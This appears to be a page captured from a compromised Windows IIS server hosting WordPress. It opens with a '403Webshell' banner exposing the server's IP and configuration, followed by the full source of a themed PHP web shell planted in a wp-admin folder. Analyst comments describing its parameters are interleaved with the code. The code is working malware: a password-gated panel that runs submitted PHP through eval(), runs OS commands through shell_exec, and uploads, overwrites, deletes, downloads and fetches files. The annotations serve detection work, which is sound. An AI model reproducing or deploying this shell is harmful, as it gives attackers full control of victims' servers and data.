403Webshell
Server IP : 69.30.224.78  /  Your IP : 216.73.217.95
Web Server : Microsoft-IIS/10.0
System : Windows NT SERVER 10.0 build 14393 (Windows Server 2016) AMD64
User : IWPD_92(newtechtest) ( 0)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-admin/user/Contracts/


Current File : C:/Inetpub/vhosts/newtechtest.in/heartcare.newtechtest.in/wp-admin/user/Contracts/index.php
<?php
/* ========================================
   Douluo Dalu (Soul Land) themed "Spirit Hall console"
   ----------------------------------------
   Analyst summary: single-file PHP web shell. Behind a password gate it
   offers file management (upload, create, rename, chmod, overwrite,
   delete, remote fetch, zip extraction), evaluation of submitted PHP
   code and execution of submitted OS commands, all driven by request
   parameters.
   Parameter names read by this script (usable as search terms in
   request captures and as static-signature strings):
     GET : reset, dir, del, view, edit, download, rename, chmod
     POST: haotian, act (+ f, n, o, m, c, u, z), hammer, blue_silver
   ======================================== */
// Starts a session, then turns off error reporting and error display;
// every call is additionally prefixed with the @ suppression operator.
@session_start();@error_reporting(0);@ini_set('display_errors',0);

/* ---- 1. "Slaughter City barrier": the login gate ---- */
// Shared access password, stored in plaintext in the file itself.
define('TANG_SAN', 'asd');

// ?reset destroys the session (logout) and redirects to the bare script URL.
if(isset($_GET['reset'])){@session_destroy();header('Location: ?');exit;}
// POST haotian is compared strictly against the constant; a match sets the
// session flag 'user'. The redirect is sent whether or not it matched.
if(isset($_POST['haotian'])){
    if($_POST['haotian']===TANG_SAN)$_SESSION['user']=1;
    header('Location: ?');exit;
}
// Without the session flag only the login form is printed and the script
// stops here; everything below runs only for a session that holds the flag.
if(!isset($_SESSION['user'])){
    echo '<!DOCTYPE html><html><head><meta charset="UTF-8"><title>杀戮之都</title><style>body{background:#0a0a0a;color:#8b0000;font-family:"Segoe UI",sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}.gate{border:2px solid #8b0000;padding:50px;text-align:center;background:rgba(10,10,10,.95);}h1{letter-spacing:15px;margin-bottom:30px;text-shadow:0 0 15px #8b0000;}input{background:transparent;color:#8b0000;border:1px solid #8b0000;padding:12px;width:280px;text-align:center;}button{margin-top:20px;padding:12px 40px;background:#8b0000;color:#0a0a0a;border:none;font-weight:bold;cursor:pointer;}</style></head><body><div class="gate"><h1>☠️ 杀 戮 之 都</h1><form method="post"><input name="haotian" type="password" placeholder="昊天锤" autofocus><br><button type="submit">破 阵</button></form></div></body></html>';
    exit;
}

/* ---- 2. Paths and variables ---- */
// Working directory: realpath() of GET dir, falling back to the script's own
// directory when the value is missing, unresolvable or not a directory.
// A single trailing directory separator is enforced. $__msg__ is initialised
// but not read anywhere in this listing.
$__cur__=isset($_GET['dir'])?realpath($_GET['dir']):realpath('.');if(!$__cur__||!is_dir($__cur__))$__cur__=realpath('.');$__cur__=rtrim($__cur__,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR;$__msg__='';

/* ---- 3. Core request handling ---- */
// POST act selects one file operation. All calls are @-suppressed and no
// result is reported back to the page.
if(isset($_POST['act'])){
    $a=$_POST['act'];
    // upload: stores the uploaded file in the working directory under the
    // basename of the client-supplied file name.
    if($a=='upload'&&!empty($_FILES['f']))@move_uploaded_file($_FILES['f']['tmp_name'],$__cur__.basename($_FILES['f']['name']));
    // mkdir / mkfile: POST n is appended to the working directory as given
    // (no basename or other normalisation); mkfile writes an empty file.
    if($a=='mkdir')@mkdir($__cur__.$_POST['n']);
    if($a=='mkfile')@file_put_contents($__cur__.$_POST['n'],'');
    // rename / chmod / save: paths come straight from POST and are not tied
    // to the working directory; save overwrites POST f with POST c.
    if($a=='rename')@rename($_POST['o'],$_POST['n']);
    if($a=='chmod')@chmod($_POST['f'],octdec($_POST['m']));
    if($a=='save')@file_put_contents($_POST['f'],$_POST['c']);
    // urldl: fetches POST u with file_get_contents() and, when the result is
    // truthy, writes it into the working directory under basename(u).
    if($a=='urldl'){$d=@file_get_contents($_POST['u']);if($d)@file_put_contents($__cur__.basename($_POST['u']),$d);}
    // unzip: when ZipArchive is available, extracts the archive at POST z
    // into the working directory.
    if($a=='unzip'&&class_exists('ZipArchive')){$z=new ZipArchive;if($z->open($_POST['z'])===TRUE){$z->extractTo($__cur__);$z->close();}}
}
// Deletion is triggered by a GET parameter: files are unlinked, anything else
// is passed to rmdir(). The target path therefore sits in the query string.
if(isset($_GET['del'])){$t=$_GET['del'];is_file($t)?@unlink($t):@rmdir($t);}

/* "Clear Sky Hammer" (Eval) */
// Passes POST hammer directly to eval() and captures whatever it prints;
// a Throwable is caught and its message printed into the same buffer.
// NOTE(review): eval() on a request parameter is the code-execution
// primitive of this file and a strong static indicator.
$__res__='';
if(isset($_POST['hammer'])){
    ob_start();try{eval($_POST['hammer']);}catch(Throwable $e){echo "魂力溃散: ".$e->getMessage();}$__res__=ob_get_clean();
}
/* "Blue Silver Domain" (Command) */
// Builds a shell line that changes into the working directory (escaped with
// escapeshellarg) and then appends POST blue_silver verbatim, with stderr
// merged into stdout. The call is unavailable when shell_exec is listed in
// PHP's disable_functions.
$__cmd__='';
if(isset($_POST['blue_silver'])){
    $__cmd__=shell_exec("cd ".escapeshellarg($__cur__)." && ".$_POST['blue_silver']." 2>&1");
}

/* ---- 4. File listing ---- */
// Reads the working directory. Only '.' is skipped, so '..' stays in the
// list. Each entry records name (n), full path (p), directory flag (d),
// size in KB or '-' for directories (s) and the last four octal digits of
// fileperms() (m).
$__files__=[];
if($dh=@opendir($__cur__)){
    while(($f=readdir($dh))!==false){
        if($f=='.')continue;
        $fp=$__cur__.$f;
        $__files__[]=['n'=>$f,'p'=>$fp,'d'=>is_dir($fp),'s'=>is_dir($fp)?'-':round(filesize($fp)/1024,2).' KB','m'=>substr(sprintf('%o',fileperms($fp)),-4)];
    }
    closedir($dh);
}
// Directories first; within each group, natural case-insensitive name order.
usort($__files__,fn($a,$b)=>$a['d']==$b['d']?strnatcasecmp($a['n'],$b['n']):($a['d']?-1:1));
// The markup that follows is the panel UI for the handlers above.
?>
<!DOCTYPE html><html lang="zh"><head><meta charset="UTF-8"><title>武魂殿</title><style>
body{font-family:"Segoe UI",sans-serif;background:#0a0a0a;color:#c0c0c0;margin:10px;font-size:14px;}
.top{background:#1a1a1a;border:1px solid #8b0000;padding:10px;margin-bottom:10px;display:flex;gap:15px;}
.top a{color:#8b0000;text-decoration:none;font-weight:bold;}
.top a.l{margin-left:auto;color:#ff4500;}
.card{background:#1a1a1a;border:1px solid #333;padding:15px;margin-bottom:15px;}
.card h3{margin-top:0;color:#8b0000;border-bottom:1px solid #333;padding-bottom:8px;}
table{width:100%;border-collapse:collapse;}
th,td{padding:8px;border:1px solid #333;}
th{background:#2a2a2a;}
tr:hover{background:#2a2a2a;}
input,textarea,select{background:#0a0a0a;color:#8b0000;border:1px solid #333;padding:6px;font-family:monospace;}
button{background:#8b0000;color:#0a0a0a;border:none;padding:6px 15px;cursor:pointer;font-weight:bold;}
.container{display:flex;gap:15px;}
.left{flex:1;}
.right{width:35%;}
pre{background:#000;color:#00ff00;padding:10px;overflow:auto;white-space:pre-wrap;}
</style></head><body>

<div class="top">
    <a href="?dir=<?php /* link to the parent of the working directory */ echo urlencode(dirname($__cur__)); ?>">[ 回圣魂村 ]</a>
    <a href="#eval">[ 昊天锤 ]</a>
    <a href="#tools">[ 魂导器 ]</a>
    <a href="?reset=1" class="l">[ 退出杀戮 ]</a>
</div>

<div class="container">
    <div class="left">
        <!-- Eval 置顶 -->
        <div class="card" id="eval">
            <h3>🔨 昊天锤 (Eval)</h3>
            <form method="post">
                <textarea name="hammer" style="width:100%;height:120px;" placeholder="phpinfo();"><?php /* re-displays the submitted POST hammer value; not HTML-escaped */ echo $_POST['hammer']??''; ?></textarea><br><br>
                <button type="submit">释 放</button>
            </form>
            <?php /* captured eval output, HTML-escaped before display */ if($__res__!==''): ?><pre><?php echo htmlspecialchars($__res__); ?></pre><?php endif; ?>
        </div>

        <!-- 文件列表 -->
        <div class="card">
            <h3>🦴 魂兽森林 (<?php /* working directory path, printed without HTML escaping */ echo $__cur__; ?>)</h3>
            <table>
                <tr><th>名称</th><th>大小</th><th>权限</th><th>操作</th></tr>
                <?php /* one row per entry of $__files__; names, sizes and modes are echoed unescaped, paths in links are urlencode()d */ foreach($__files__ as $f): ?>
                <tr>
                    <td><?php if($f['d']):?><a href="?dir=<?php echo urlencode($f['p']); ?>" style="color:#8b0000;"><?php echo $f['n']; ?>/</a><?php else: ?><a href="?view=<?php echo urlencode($f['p']); ?>"><?php echo $f['n']; ?></a><?php endif; ?></td>
                    <td><?php echo $f['s']; ?></td>
                    <td><?php echo $f['m']; ?></td>
                    <td>
                        <?php if(!$f['d']): ?><a href="?edit=<?php echo urlencode($f['p']); ?>">修</a>|<a href="?download=<?php echo urlencode($f['p']); ?>">取</a>|<?php endif; ?>
                        <a href="?rename=<?php echo urlencode($f['p']); ?>">名</a>|<a href="?chmod=<?php echo urlencode($f['p']); ?>">权</a>|<a href="?del=<?php echo urlencode($f['p']); ?>" onclick="return confirm('魂飞魄散?')">灭</a>
                    </td>
                </tr>
                <?php endforeach; ?>
            </table>
        </div>
    </div>

    <div class="right">
        <div class="card" id="tools">
            <h3>🧰 魂导器 (Tools)</h3>
            <form method="post" enctype="multipart/form-data"><input type="hidden" name="act" value="upload">收纳:<input type="file" name="f"> <button>入魂</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="urldl">URL:<input type="text" name="u" style="width:60%;"> <button>摄取</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="unzip">解压:<input type="text" name="z" style="width:60%;"> <button>炸开</button></form><hr>
            <form method="post"><input type="hidden" name="act" value="mkdir">建穴:<input type="text" name="n"> <button>凿开</button></form>
            <form method="post"><input type="hidden" name="act" value="mkfile">留书:<input type="text" name="n"> <button>刻字</button></form>
        </div>
        <div class="card">
            <h3>🌿 蓝银领域 (Terminal)</h3>
            <form method="post"><input type="text" name="blue_silver" style="width:80%;" placeholder="ls -la"> <button>缠绕</button></form>
            <?php /* shell_exec output, HTML-escaped before display */ if($__cmd__): ?><pre><?php echo htmlspecialchars($__cmd__); ?></pre><?php endif; ?>
        </div>
    </div>
</div>

<?php
/* Per-request panels selected by GET parameters. Each takes its path from
   the query string as given; none of them ties the path to the working
   directory. */
// download: for an existing file, sends a Content-Disposition attachment
// header, streams the file and exits.
// NOTE(review): this runs after the page markup above has been emitted, so
// the header() call presumably has no effect unless output buffering is
// active, and the file bytes are appended to the HTML response - confirm.
if(isset($_GET['download'])){$f=$_GET['download'];if(is_file($f)){header('Content-Disposition: attachment; filename="'.basename($f).'"');readfile($f);exit;}}
// view: prints the HTML-escaped contents of an existing file.
if(isset($_GET['view'])){$f=$_GET['view'];if(is_file($f)){echo '<div class="card"><pre>'.htmlspecialchars(file_get_contents($f)).'</pre></div>';}}
// edit: renders a form that posts act=save with the file's current contents
// (escaped) in a textarea. There is no is_file() check, and the path is
// placed into the hidden field's value attribute without escaping.
if(isset($_GET['edit'])){$f=$_GET['edit'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="save"><input type="hidden" name="f" value="'.$f.'"><textarea name="c" style="width:100%;height:300px;">'.htmlspecialchars(file_get_contents($f)).'</textarea><br><br><button type="submit">封存</button></form></div>';}
// rename: renders a form that posts act=rename with the old path (o) and a
// new name (n) pre-filled with its basename; both are inserted unescaped.
if(isset($_GET['rename'])){$o=$_GET['rename'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="rename"><input type="hidden" name="o" value="'.$o.'"><input type="text" name="n" value="'.basename($o).'"> <button>更名</button></form></div>';}
// chmod: renders a form that posts act=chmod for the path, offering the
// modes 0644 and 0755; the path is inserted unescaped.
if(isset($_GET['chmod'])){$f=$_GET['chmod'];echo '<div class="card"><form method="post"><input type="hidden" name="act" value="chmod"><input type="hidden" name="f" value="'.$f.'"><select name="m"><option value="0644">0644</option><option value="0755">0755</option></select> <button>加盖</button></form></div>';}
?>
</body></html>
